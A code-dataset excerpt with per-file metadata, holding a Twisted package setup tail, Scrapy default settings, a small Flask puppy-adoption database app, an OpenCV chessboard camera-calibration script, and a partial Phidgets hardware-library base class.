    # Ship the package itself plus the Twisted plugin dropin module.
    packages=['rproxy', 'twisted.plugins'],
    package_dir={"": "src"},
    install_requires=[
        'twisted >= 15.5.0',
        'pyopenssl',
        'txsni',
        'incremental',
    ],
    zip_safe=False,
    # Version numbers are managed by the `incremental` tool.
    setup_requires=["incremental"],
    use_incremental=True,
)
| [
"hawkowl@atleastfornow.net"
] | hawkowl@atleastfornow.net |
bbb72ffa923b27d537784da348b18c9fcf06c497 | 44c88063c9768bee3d7c6a01fa571748aec59073 | /scrapy/miao/opendv/opendv/settings.py | 8d7d5207ed637af13cc287af5b619fe130d2419f | [] | no_license | K-G-1/sprider | 0e5b10d61edba1f76e7e6dd936f34caa0a65c8a7 | dd91306d61363421ab5c0ae59565065475fba237 | refs/heads/master | 2021-04-30T14:39:06.061003 | 2018-03-11T13:28:44 | 2018-03-11T13:28:44 | 121,222,544 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,988 | py | # -*- coding: utf-8 -*-
# Scrapy settings for opendv project
#
# For simplicity, this file contains only settings considered important or
# commonly used. You can find more settings consulting the documentation:
#
# http://doc.scrapy.org/en/latest/topics/settings.html
# http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
# http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
BOT_NAME = 'opendv'  # crawler name used in logs and the default user-agent
SPIDER_MODULES = ['opendv.spiders']  # packages scrapy scans for spider classes
NEWSPIDER_MODULE = 'opendv.spiders'  # where `scrapy genspider` creates new spiders
# Crawl responsibly by identifying yourself (and your website) on the user-agent
#USER_AGENT = 'opendv (+http://www.yourdomain.com)'
# Configure maximum concurrent requests performed by Scrapy (default: 16)
#CONCURRENT_REQUESTS=32
# Configure a delay for requests for the same website (default: 0)
# See http://scrapy.readthedocs.org/en/latest/topics/settings.html#download-delay
# See also autothrottle settings and docs
#DOWNLOAD_DELAY=3
# The download delay setting will honor only one of:
#CONCURRENT_REQUESTS_PER_DOMAIN=16
#CONCURRENT_REQUESTS_PER_IP=16
# Disable cookies (enabled by default)
#COOKIES_ENABLED=False
# Disable Telnet Console (enabled by default)
#TELNETCONSOLE_ENABLED=False
# Override the default request headers:
#DEFAULT_REQUEST_HEADERS = {
# 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
# 'Accept-Language': 'en',
#}
# Enable or disable spider middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/spider-middleware.html
#SPIDER_MIDDLEWARES = {
# 'opendv.middlewares.MyCustomSpiderMiddleware': 543,
#}
# Enable or disable downloader middlewares
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html
#DOWNLOADER_MIDDLEWARES = {
# 'opendv.middlewares.MyCustomDownloaderMiddleware': 543,
#}
# Enable or disable extensions
# See http://scrapy.readthedocs.org/en/latest/topics/extensions.html
#EXTENSIONS = {
# 'scrapy.telnet.TelnetConsole': None,
#}
# Configure item pipelines
# See http://scrapy.readthedocs.org/en/latest/topics/item-pipeline.html
#ITEM_PIPELINES = {
# 'opendv.pipelines.SomePipeline': 300,
#}
# Enable and configure the AutoThrottle extension (disabled by default)
# See http://doc.scrapy.org/en/latest/topics/autothrottle.html
# NOTE: AutoThrottle will honour the standard settings for concurrency and delay
#AUTOTHROTTLE_ENABLED=True
# The initial download delay
#AUTOTHROTTLE_START_DELAY=5
# The maximum download delay to be set in case of high latencies
#AUTOTHROTTLE_MAX_DELAY=60
# Enable showing throttling stats for every response received:
#AUTOTHROTTLE_DEBUG=False
# Enable and configure HTTP caching (disabled by default)
# See http://scrapy.readthedocs.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings
#HTTPCACHE_ENABLED=True
#HTTPCACHE_EXPIRATION_SECS=0
#HTTPCACHE_DIR='httpcache'
#HTTPCACHE_IGNORE_HTTP_CODES=[]
#HTTPCACHE_STORAGE='scrapy.extensions.httpcache.FilesystemCacheStorage'
| [
"2060713822@qq.com"
] | 2060713822@qq.com |
27e8148639ef3900c658043fd8f3134b0427f2e7 | 47e5ec3519cc913a48604f6974d1ff50512c35ed | /flask_db_view/adoption.py | d2d0b1f26819c55a7044831b98c5029adb76569a | [] | no_license | Tuxaura/flask_example | a3e25a8a6c3a94c3834b7fbaf56a19c7d5273607 | 92a1e374592430d78f72af82323f19550b3644c2 | refs/heads/main | 2023-01-03T23:30:15.785440 | 2020-10-20T03:01:35 | 2020-10-20T03:01:35 | 305,043,712 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,999 | py | import os
from forms import AddForm, DelForm
from flask import Flask, render_template, url_for, redirect
from flask_sqlalchemy import SQLAlchemy
from flask_migrate import Migrate
app = Flask(__name__)
app.config['SECRET_KEY'] = 'mysecretkey'
########################################
######## SQLITE DATABASE SECTION #######
########################################
basedir = os.path.abspath(os.path.dirname(__file__))
app.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///'+os.path.join(basedir, 'data.sqlite')
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
db = SQLAlchemy(app)
Migrate(app, db)
########################################
############### MODELS #################
########################################
class Puppy(db.Model):
    """SQLAlchemy model for an adoptable puppy (table ``puppies``)."""

    __tablename__ = 'puppies'
    # Surrogate integer primary key.
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.Text)

    def __init__(self, name):
        self.name = name

    def __repr__(self):
        return f"Puppy name: {self.name}"
########################################
################ VIEW ##################
########################################
@app.route("/")
def index():
return render_template("home.html")
@app.route('/add', methods=['GET', 'POST'])
def add_pup():
    """Show the add-puppy form; on a valid submit, persist and go to the list."""
    form = AddForm()
    if not form.validate_on_submit():
        return render_template('add.html', form=form)
    db.session.add(Puppy(form.name.data))
    db.session.commit()
    return redirect(url_for('list_pup'))
@app.route("/list")
def list_pup():
puppies = Puppy.query.all()
return render_template('list.html', puppies=puppies)
@app.route("/delete")
def del_pup():
form = DelForm()
if form.validate_on_submit():
id = form.id.data
pup = Puppy.query.get(id)
db.session.delete(pup)
db.session.commit()
return redirect(url_for('list_pup'))
return render_template('delete.html', form=form)
if __name__ == '__main__':
app.run(debug=True) | [
"bebenx@gmail.com"
] | bebenx@gmail.com |
1899eab304d24281ff12e625cfc407a5a261e1e3 | 0b9503244be5a9ce6478405c20de33843240e51f | /calibrate.py | 7f9c5963edbd6f762a028d4ec4ec5584947b1080 | [] | no_license | ConnorBurnsCoder/3dObjectReconstruction | 216819a0fedc882938a22e8bab8de72d895c3e83 | 05899167262d74bbb3b87a8d05cd05686828f571 | refs/heads/main | 2023-02-17T07:20:19.711157 | 2021-01-17T02:34:15 | 2021-01-17T02:34:15 | 330,282,689 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,383 | py | #
# To run:
#
# Install opencv modules in Anaconda environment:
#
# conda install opencv
# pip install --upgrade pip
# pip install opencv-contrib-python
#
# Run calibrate.py from the commandline:
#
# python calibrate.py
import pickle
import numpy as np
import cv2
import glob
import matplotlib.pyplot as plt
# file names, modify as necessary
calibimgfiles = 'calib_jpg_u/*.jpg'
resultfile = 'calibration.pickle'
# checkerboard coordinates in 3D
# 8x6 inner-corner grid; 2.8 presumably is the physical square size — confirm.
objp = np.zeros((6*8,3), np.float32)
objp[:,:2] = 2.8*np.mgrid[0:8, 0:6].T.reshape(-1,2)
# arrays to store object points and image points from all the images.
objpoints = [] # 3d points in real world space
imgpoints = [] # 2d points in image plane.
# Make a list of calibration images
images = glob.glob(calibimgfiles)
# Step through the list and search for chessboard corners
for idx, fname in enumerate(images):
    img = cv2.imread(fname)
    img_size = (img.shape[1], img.shape[0])
    gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
    # Find the chessboard corners
    ret, corners = cv2.findChessboardCorners(gray, (8,6), None)
    # If found, add object points, image points
    if ret == True:
        objpoints.append(objp)
        imgpoints.append(corners)
        # Display image with the corners overlayed
        cv2.drawChessboardCorners(img, (8,6), corners, ret)
        cv2.imshow('img', img)
        cv2.waitKey(500)
cv2.destroyAllWindows()
# now perform the calibration
# NOTE(review): img_size comes from the last image processed; assumes all
# calibration images share one resolution — confirm.
ret, K, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)
print("Estimated camera intrinsic parameter matrix K")
print(K)
print("Estimated radial distortion coefficients")
print(dist)
print("Individual intrinsic parameters")
print("fx = ",K[0][0])
print("fy = ",K[1][1])
print("cx = ",K[0][2])
print("cy = ",K[1][2])
# save the results out to a file for later use
calib = {}
calib["fx"] = K[0][0]
calib["fy"] = K[1][1]
calib["cx"] = K[0][2]
calib["cy"] = K[1][2]
calib["dist"] = dist
fid = open(resultfile, "wb" )
pickle.dump(calib,fid)
fid.close()
#
# optionally go through and remove radial distortion from a set of images
#
#images = glob.glob(calibimgfiles)
#for idx, fname in enumerate(images):
# img = cv2.imread(fname)
# img_size = (img.shape[1], img.shape[0])
#
# dst = cv2.undistort(img, K, dist, None, K)
# udfname = fname+'undistort.jpg'
# cv2.imwrite(udfname,dst)
#
| [
"noreply@github.com"
] | noreply@github.com |
3040eece0cb8864c9e7d39ddab4a66343a0f3988 | 2112e4cfd9568128573098f8e209962002f66a23 | /app.py | 23284a6ccf1befdf6ba398a9fa834d9e7048b7e3 | [] | no_license | amazingguni/stock-trader | 0bd39cce6f6462c9648e3c8b2893b3e8379e37ca | 252c9230885200cfde845f2a03677140564cfc62 | refs/heads/main | 2023-05-05T18:26:04.124690 | 2021-05-30T13:12:58 | 2021-05-30T13:12:58 | 362,616,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,296 | py | from flask import Flask, Response
from flask_login import LoginManager
from flask_cors import CORS
from config import get_config_by_env
from container import Container
from web.admin import admin
from mongodb import db
login_manager = LoginManager()
def create_app():
    """Application factory: build and configure the Flask app.

    Sets up config, CORS, login, the dependency-injection container wired
    into the admin views, and the admin/MongoDB extensions.
    """
    app = Flask(__name__, template_folder='./web/templates')

    @app.route('/')
    # pylint: disable=unused-variable
    def index():
        # Empty 200 response at the root path.
        return Response(status=200)

    app.config.from_object(get_config_by_env())
    CORS(app)
    login_manager.init_app(app)
    container = Container()
    app.container = container

    # Imported inside the factory — presumably to avoid circular imports
    # at module load time; confirm before moving to the top of the file.
    from web.admin.views import sync as admin_sync_views
    from web.admin.views import stock as admin_stock_views
    from web.admin.views import portfolio as admin_portfolio_views
    admin_views = [admin_sync_views,
                   admin_stock_views, admin_portfolio_views, ]
    with app.app_context():
        container.wire(modules=admin_views)
    admin.init_app(app)
    db.init_app(app)
    return app
def register_blueprints(app, views):
    """Register each view module's blueprint (exposed as ``.bp``) on the app."""
    for blueprint in (module.bp for module in views):
        app.register_blueprint(blueprint)
@login_manager.user_loader
def load_user(user_id):
from core.user.domain.user import User
return User.query.filter(User.id == user_id).first()
app = create_app()
| [
"amazingguni@gmail.com"
] | amazingguni@gmail.com |
862e1582b1eea05a10d17fec0afe45b0ba83391c | 17e08f795273d6f4233ab440c2706130f6520b58 | /fannypack/utils/_deprecation.py | 9174fd10a6bbb73f059b87105a1183e6c2716f63 | [
"MIT"
] | permissive | HaoWen470/fannypack | db5e6bb670004e470254e1e632899aeec38ee041 | 7e2c949de0e0cac69a95a5a777f8a4b1fa0fc17a | refs/heads/master | 2023-01-03T20:35:35.248848 | 2020-10-31T09:01:01 | 2020-10-31T09:01:01 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | import warnings
from typing import Callable
def deprecation_wrapper(message: str, function_or_class: Callable) -> Callable:
    """Wrap a deprecated callable so its first invocation emits a warning.

    Args:
        message (str): Text of the deprecation warning.
        function_or_class (Callable): The deprecated callable to wrap.

    Returns:
        Callable: A pass-through wrapper around ``function_or_class``.
    """
    state = {"warned": False}

    def wrapper(*args, **kwargs):  # pragma: no cover
        if not state["warned"]:
            warnings.warn(message, DeprecationWarning, stacklevel=2)
            state["warned"] = True
        return function_or_class(*args, **kwargs)

    return wrapper
def new_name_wrapper(
    old_name: str, new_name: str, function_or_class: Callable
) -> Callable:
    """Wrap a renamed callable; warns once that ``old_name`` became ``new_name``.

    Args:
        old_name (str): Deprecated name, shown in the warning.
        new_name (str): Replacement name, shown in the warning.
        function_or_class (Callable): Function or class to wrap.

    Returns:
        Callable: Wrapped function/class.
    """
    warning_text = f"{old_name} is deprecated! Use {new_name} instead."
    return deprecation_wrapper(warning_text, function_or_class)
| [
"yibrenth@gmail.com"
] | yibrenth@gmail.com |
6f376d5a004ec5eee4d889f2bc0c73627de267aa | 5e05992e2b92c7aeb98183814ac75e994a8c1be5 | /Python OSC SENSOR RECIEVE/Phidgets/Phidget.py | 294727d138ef110694b5e802f7c587fd00b61b40 | [] | no_license | tijmenvangurp/Glow-festival-code | 2cf383b0d030ea78ad67c40042c0691e016b2dbf | b9e51a8ae74e0353e8a84088e8e01a8b3d6e267c | refs/heads/master | 2021-01-21T02:00:19.470907 | 2015-04-10T08:30:35 | 2015-04-10T08:30:35 | 33,717,425 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 42,346 | py | """
Copyright 2010 Phidgets Inc.
This work is licensed under the Creative Commons Attribution 2.5 Canada License.
To view a copy of this license, visit http://creativecommons.org/licenses/by/2.5/ca/
"""
from Phidgets import PhidgetException
__author__ = 'Adam Stelmack'
__version__ = '2.1.8'
__date__ = 'May 17 2010'
from Phidgets.Common import prepOutput
from ctypes import *
from Phidgets.PhidgetLibrary import PhidgetLibrary
from Phidgets.Events.Events import AttachEventArgs, DetachEventArgs, ErrorEventArgs, ServerConnectArgs
import sys
class PhidgetLogLevel:
    """Log level constants passed to the Phidgets library logger."""
    PHIDGET_LOG_CRITICAL = 1
    PHIDGET_LOG_ERROR = 2
    PHIDGET_LOG_WARNING = 3
    PHIDGET_LOG_DEBUG = 4
    PHIDGET_LOG_INFO = 5
    PHIDGET_LOG_VERBOSE = 6
class PhidgetClass:
    """Numeric device-class codes with a reverse name lookup (toString)."""

    NOTHING = 1
    ACCELEROMETER = 2
    ADVANCEDSERVO = 3
    ANALOG = 22
    BRIDGE = 23
    ENCODER = 4
    FREQUENCYCOUNTER = 21
    GPS = 5
    INTERFACEKIT = 7
    IR = 19
    LED = 8
    MOTORCONTROL = 9
    PHSENSOR = 10
    RFID = 11
    SERVO = 12
    SPATIAL = 20
    STEPPER = 13
    TEMPERATURESENSOR = 14
    TEXTLCD = 15
    TEXTLED = 16
    WEIGHTSENSOR = 17

    @staticmethod
    def toString(val):
        """Return the symbolic name for a class code, or "NOTHING" if unknown."""
        names = {
            2: "ACCELEROMETER",
            3: "ADVANCEDSERVO",
            22: "ANALOG",
            23: "BRIDGE",
            4: "ENCODER",
            21: "FREQUENCYCOUNTER",
            5: "GPS",
            7: "INTERFACEKIT",
            19: "IR",
            8: "LED",
            9: "MOTORCONTROL",
            10: "PHSENSOR",
            11: "RFID",
            12: "SERVO",
            20: "SPATIAL",
            13: "STEPPER",
            14: "TEMPERATURESENSOR",
            15: "TEXTLCD",
            16: "TEXTLED",
            17: "WEIGHTSENSOR",
        }
        return names.get(val, "NOTHING")
class PhidgetID:
    """Numeric identifiers for specific Phidget device models."""
    # These are all current devices
    PHIDID_ACCELEROMETER_3AXIS = 0x07E #< Phidget 3-axis Accelerometer (1059)
    PHIDID_ADVANCEDSERVO_1MOTOR = 0x082 #< Phidget 1 Motor Advanced Servo (1066)
    PHIDID_ADVANCEDSERVO_8MOTOR = 0x03A #< Phidget 8 Motor Advanced Servo (1061)
    PHIDID_ANALOG_4OUTPUT = 0x037 #< Phidget Analog 4-output (1002)
    PHIDID_BIPOLAR_STEPPER_1MOTOR = 0x07B #< Phidget 1 Motor Bipolar Stepper Controller with 4 Digital Inputs (1063)
    PHIDID_BRIDGE_4INPUT = 0x03B #< Phidget Bridge 4-input (1046)
    PHIDID_ENCODER_1ENCODER_1INPUT = 0x04B #< Phidget Encoder - Mechanical (1052)
    PHIDID_ENCODER_HS_1ENCODER = 0x080 #< Phidget High Speed Encoder (1057)
    PHIDID_ENCODER_HS_4ENCODER_4INPUT = 0x04F #< Phidget High Speed Encoder - 4 Encoder (1047)
    PHIDID_FREQUENCYCOUNTER_2INPUT = 0x035 #< Phidget Frequency Counter 2-input (1054)
    PHIDID_GPS = 0x079 #< Phidget GPS (1040)
    PHIDID_INTERFACEKIT_0_0_4 = 0x040 #< Phidget Interface Kit 0/0/4 (1014)
    PHIDID_INTERFACEKIT_0_0_8 = 0x081 #< Phidget Interface Kit 0/0/8 (1017)
    PHIDID_INTERFACEKIT_0_16_16 = 0x044 #< Phidget Interface Kit 0/16/16 (1012)
    PHIDID_INTERFACEKIT_2_2_2 = 0x036 #< Phidget Interface Kit 2/2/2 (1011)
    PHIDID_INTERFACEKIT_8_8_8 = 0x045 #< Phidget Interface Kit 8/8/8 (1013, 1018, 1019)
    PHIDID_INTERFACEKIT_8_8_8_w_LCD = 0x07D #< Phidget Interface Kit 8/8/8 with TextLCD (1201, 1202, 1203)
    PHIDID_IR = 0x04D #< Phidget IR Receiver Transmitter (1055)
    PHIDID_LED_64_ADV = 0x04C #< Phidget LED 64 Advanced (1031)
    PHIDID_LINEAR_TOUCH = 0x076 #< Phidget Linear Touch (1015)
    PHIDID_MOTORCONTROL_1MOTOR = 0x03E #< Phidget 1 Motor Motor Controller (1065)
    PHIDID_MOTORCONTROL_HC_2MOTOR = 0x059 #< Phidget 2 Motor High Current Motor Controller (1064)
    PHIDID_RFID_2OUTPUT = 0x031 #< Phidget RFID with Digital Outputs and Onboard LED (1023)
    PHIDID_ROTARY_TOUCH = 0x077 #< Phidget Rotary Touch (1016)
    PHIDID_SPATIAL_ACCEL_3AXIS = 0x07F #< Phidget Spatial 3-axis accel (1049)
    PHIDID_SPATIAL_ACCEL_GYRO_COMPASS = 0x033 #< Phidget Spatial 3/3/3 (1056)
    PHIDID_TEMPERATURESENSOR = 0x070 #< Phidget Temperature Sensor (1051)
    PHIDID_TEMPERATURESENSOR_4 = 0x032 #< Phidget Temperature Sensor 4-input (1048)
    PHIDID_TEMPERATURESENSOR_IR = 0x03C #< Phidget Temperature Sensor IR (1045)
    PHIDID_TEXTLCD_2x20_w_8_8_8 = 0x17D #< Phidget TextLCD with Interface Kit 8/8/8 (1201, 1202, 1203)
    PHIDID_TEXTLCD_ADAPTER = 0x03D #< Phidget TextLCD Adapter (1204)
    PHIDID_UNIPOLAR_STEPPER_4MOTOR = 0x07A #< Phidget 4 Motor Unipolar Stepper Controller (1062)
    # These are all past devices (no longer sold)
    PHIDID_ACCELEROMETER_2AXIS = 0x071 #< Phidget 2-axis Accelerometer (1053, 1054)
    PHIDID_INTERFACEKIT_0_8_8_w_LCD = 0x053 #< Phidget Interface Kit 0/8/8 with TextLCD (1219, 1220, 1221)
    PHIDID_INTERFACEKIT_4_8_8 = 4 #< Phidget Interface Kit 4/8/8
    PHIDID_LED_64 = 0x04A #< Phidget LED 64 (1030)
    PHIDID_MOTORCONTROL_LV_2MOTOR_4INPUT = 0x058 #< Phidget 2 Motor Low Voltage Motor Controller with 4 Digital Inputs (1060)
    PHIDID_PHSENSOR = 0x074 #< Phidget PH Sensor (1058)
    PHIDID_RFID = 0x030 #< Phidget RFID without Digital Outputs
    PHIDID_SERVO_1MOTOR = 0x039 #< Phidget 1 Motor Servo Controller (1000)
    PHIDID_SERVO_1MOTOR_OLD = 2 #< Phidget 1 Motor Servo Controller - Old Version
    PHIDID_SERVO_4MOTOR = 0x038 #< Phidget 4 Motor Servo Controller (1001)
    PHIDID_SERVO_4MOTOR_OLD = 3 #< Phidget 4 Motor Servo Controller - Old Version
    PHIDID_TEXTLCD_2x20 = 0x052 #< Phidget TextLCD without Interface Kit (1210)
    PHIDID_TEXTLCD_2x20_w_0_8_8 = 0x153 #< Phidget TextLCD with Interface Kit 0/8/8 (1219, 1220, 1221)
    PHIDID_TEXTLED_1x8 = 0x049 #< Phidget TextLED 1x8
    PHIDID_TEXTLED_4x8 = 0x048 #< Phidget TextLED 4x8 (1040)
    PHIDID_WEIGHTSENSOR = 0x072 #< Phidget Weight Sensor (1050)
    @staticmethod
    def toString(val):
        """Return the PHIDID_* constant name matching val, or "NOTHING"."""
        # Every PHIDID_* value above is unique, so scanning the class
        # attributes gives the same answer as the original if/elif chain.
        for name, number in vars(PhidgetID).items():
            if name.startswith("PHIDID_") and number == val:
                return name
        return "NOTHING"
class Phidget:
"""This is the base class from which all Phidget device classes derive."""
def __init__(self):
"""Default Class constructor.
This constructor is to be used only by subclasses, as the Phidget calss should never need to be instatiated directly by the user.
"""
self.handle = c_void_p()
self.__attach = None
self.__detach = None
self.__error = None
self.__serverConnect = None
self.__serverDisconnect = None
self.__onAttach = None
self.__onDetach = None
self.__onError = None
self.__onServerConnect = None
self.__onServerDisconnect = None
if sys.platform == 'win32':
self.__ATTACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
self.__DETACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
self.__ERRORHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_char_p)
self.__SERVERATTACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
self.__SERVERDETACHHANDLER = WINFUNCTYPE(c_int, c_void_p, c_void_p)
elif sys.platform == 'darwin' or sys.platform == 'linux2':
self.__ATTACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
self.__DETACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
self.__ERRORHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p, c_int, c_char_p)
self.__SERVERATTACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
self.__SERVERDETACHHANDLER = CFUNCTYPE(c_int, c_void_p, c_void_p)
@staticmethod
def dispose(self):
try:
result = PhidgetLibrary.getDll().CPhidget_delete(self.handle)
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
self.handle = None
def closePhidget(self):
"""Closes this Phidget.
This will shut down all threads dealing with this Phidget and you won't recieve any more events.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
try:
result = PhidgetLibrary.getDll().CPhidget_close(self.handle)
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def openPhidget(self, serial=-1):
"""Open a Phidget with or without a serial number.
Open is pervasive. What this means is that you can call open on a device before it is plugged in, and keep the device opened across device dis- and re-connections.
Open is Asynchronous. What this means is that open will return immediately -- before the device being opened is actually available,
so you need to use either the attach event or the waitForAttachment method to determine if a device is available before using it.
If no arguement is provided, the first available Phidget will be opened. If there are two Phidgets of the same type attached to the system,
you should specify a serial number, as there is no guarantee which Phidget will be selected by the call to open().
The serial number is a unique number assigned to each Phidget during production and can be used to uniquely identify specific phidgets.
Parameters:
serial<int>: The serial number of the device
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException
"""
try:
result = PhidgetLibrary.getDll().CPhidget_open(self.handle, c_int(serial))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def openRemote(self, serverID, serial=-1, password=""):
"""Open this Phidget remotely using a Server ID, securely providing a password, and whether or not to connect to a specific serial number.
Providing a password will open the connection securely depending on if a password is set on the host machine's webservice.
If no serial number is provided, the first available Phidget will be opened. If there are two Phidgets of the same type attached to the system,
you should specify a serial number, as there is no guarantee which Phidget will be selected by the call to open().
Parameters:
serverID<string>: ServerID of the Phidget Webservice
serial<int>: The serial number of the device
password<string>: The secure password for the Phidget Webservice
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if the Phidget Webservice cannot be contacted
"""
if not isinstance(serial, int):
if password == "":
password = serial
serial = -1
else:
raise TypeError("inappropriate arguement type: serial %s" % (type(serial)))
try:
result = PhidgetLibrary.getDll().CPhidget_openRemote(self.handle, c_int(serial), c_char_p(serverID), c_char_p(password))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def openRemoteIP(self, IPAddress, port, serial=-1, password=""):
"""Open this Phidget remotely using an IP Address, securely providing a password,and whether or not to connect to a specific serial number.
Providing a password will open the connection securely depending on if a password is set on the host machine's webservice.
If no serial number is provided, the first available Phidget will be opened. If there are two Phidgets of the same type attached to the system,
you should specify a serial number, as there is no guarantee which Phidget will be selected by the call to open().
Parameters:
IPAddress<string>: IP Address or hostname of the Phidget Webservice
port<int>: Port of the Phidget Webservice
serial<int>: The serial number of the device
password<string>: The secure password for the Phidget Webservice
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: if the Phidget Webservice cannot be contacted
"""
if not isinstance(serial, int):
if password == "":
password = serial
serial = -1
else:
raise TypeError("inappropriate arguement type: serial %s" % (type(serial)))
try:
result = PhidgetLibrary.getDll().CPhidget_openRemoteIP(self.handle, c_int(serial), c_char_p(IPAddress), c_int(port), c_char_p(password))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
def getDeviceLabel(self):
"""Gets the label associated with this Phidget.
This label is a String - up to ten digits - that is stored in the Flash memory of newer Phidgets.
This label can be set programatically (see setDeviceLabel), and is non-volatile - so it is remembered even if the Phidget is unplugged.
Returns:
The label associated with this Phidget <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached, or if this Phidget does not support labels.
"""
label = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceLabel(self.handle, byref(label))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(label)
def getDeviceName(self):
"""Return the name of this Phidget.
This is a string that describes the device. For example, a PhidgetInterfaceKit
could be described as "Phidget InterfaceKit 8/8/8", or "Phidget InterfaceKit 0/0/4", among others, depending on the specific device.
This lets you determine the specific type of a Phidget, within the broader classes of Phidgets, such as PhidgetInterfaceKit, or PhidgetServo.
Returns:
The name of the device <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this phidget is not opened or attached.
"""
ptr = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceName(self.handle, byref(ptr))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(ptr)
def getDeviceType(self):
"""Return the device type of this Phidget.
This is a string that describes the device as a class of devices. For example, all PhidgetInterfaceKit Phidgets
will returns the String "PhidgetInterfaceKit".
Returns:
The Device Type <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
ptr = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceType(self.handle, byref(ptr))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(ptr)
def getDeviceClass(self):
"""Gets the class of this Phidget.
Classes represent a group of Phidgets that use the same API type.
Returns:
The Device Class number<int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
classNum = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceClass(self.handle, byref(classNum))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return classNum.value
def getDeviceID(self):
"""Gets the ID of this Phidget.
This ID specifies a specific Phidget device, within the phidget class.
Returns:
The Device ID <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
deviceID = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceID(self.handle, byref(deviceID))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return deviceID.value
def getDeviceVersion(self):
"""Returns the device version of this Phidget.
This number is simply a way of distinguishing between different revisions of a specific type of Phidget, and is
only really of use if you need to troubleshoot device problems with Phidgets Inc.
Returns:
The Device Version <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If there is no Phidget attached.
"""
version = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceVersion(self.handle, byref(version))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return version.value
def isAttached(self):
"""Returns the attached status of this Phidget.
This method returns True or False, depending on whether the Phidget is phisically plugged into the computer, initialized, and ready to use - or not.
If a Phidget is not attached, many functions calls will fail with a PhidgetException, so either checking this function, or using the Attach and Detach events, is recommended, if a device is likely to be attached or detached during use.
Returns:
Attached Status of the Phidget <boolean>
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened.
"""
status = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getDeviceStatus(self.handle, byref(status))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
if status.value == 1:
return True
else:
return False
def getLibraryVersion(self):
"""Returns the library version.
This is the library version of the underlying phidget21 C library and not the version of the Python wrapper module implementation.
The version is retured as a string which contains the version number and build date.
Returns:
The Library Version <string>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
libVer = c_char_p()
try:
result = PhidgetLibrary.getDll().CPhidget_getLibraryVersion(byref(libVer))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return prepOutput(libVer)
def getSerialNum(self):
"""Returns the unique serial number of this Phidget.
This number is set during manufacturing, and is unique across all Phidgets. This number can be used in calls to open to specify this specific Phidget to be opened.
Returns:
The Serial Number <int>.
Exceptions:
RuntimeError - If current platform is not supported/phidget c dll cannot be found
PhidgetException: If this Phidget is not opened and attached.
"""
serialNo = c_int()
try:
result = PhidgetLibrary.getDll().CPhidget_getSerialNumber(self.handle, byref(serialNo))
except RuntimeError:
raise
if result > 0:
raise PhidgetException(result)
else:
return serialNo.value
def __nativeAttachEvent(self, handle, usrptr):
if self.__attach != None:
